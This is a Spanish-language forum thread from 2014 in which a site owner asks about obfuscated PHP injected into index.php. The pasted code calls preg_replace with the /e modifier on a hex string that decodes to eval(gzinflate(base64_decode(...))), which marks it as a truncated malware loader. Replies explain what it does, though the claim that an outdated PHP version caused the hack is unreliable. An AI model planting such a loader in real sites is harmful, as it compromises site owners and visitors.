Hackeo web.

specnaz · #1 (**permalink**) 01/05/2014, 10:53

Muy buenas. Resulta que los del google han puesto en mi web el mensaje "Este sitio puede haber sido comprometido". He estado leyendo al respecto y he encontrado que la página index.php me habían puesto un código al inicio que empieza así:

Código:

<?php ob_start(); ?>
<?php
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'lZ3JjuxMspz3AvQOPxq9kDYXRcaUiYbeJDbMCYKgXvRd6P799io67TOPKgkNaVE4p7Iyk2SED+bmQ/z1z//4x378848//u2//fGX+ef4+v7Z55+9ff+M+Wf75O

El código es muy largo y me redireccionaba a una web para descargar un supuesto fichero que necesitaba. Viendo la página con el caché de google también había una especie de texto médico al inicio.
He resubido una copia de seguridad y parece que se ha solucionado. Pero, ¿me podéis decir qué tipo de código es este y cómo es que me ha aparecido en la cabecera?

Gracias y un saludo.

Italico76 · #2 (**permalink**) 01/05/2014, 20:09

Eso lo que hace es ejecutarte un codigo que esta ofuscado en hexadecimal.

Te ha pasado porque la version de PHP de tu servidor esta muy desactualizada: el parametro /e (PREG_REPLACE_EVAL) en esa funcion ya fue dejado de lado por cuestiones de seguridad (!)

http://stackoverflow.com/questions/1...regex-modifier
http://stackoverflow.com/questions/2...pression-flags

edward1994 · #3 (**permalink**) 02/05/2014, 00:10

Me imagino que ese codigo malicioso fue ingresado a través de un formulario que posees! asi que te recomiendo usar filtros para eliminar posibles ataques! En los FAQ del foro hay uno que encontré una vez se que la funcion que realizo un usuario aca se llama filtroxss(); Debes buscarlo! Ve el lado bueno de los hackeos, te ponen en una situación que debes aprender cosas nuevas si o si!

specnaz · #4 (**permalink**) 02/05/2014, 08:04

Gracias por vuestras respuestas, voy a investigar y ver si puedo ir eliminando debilidades.
Un saludo.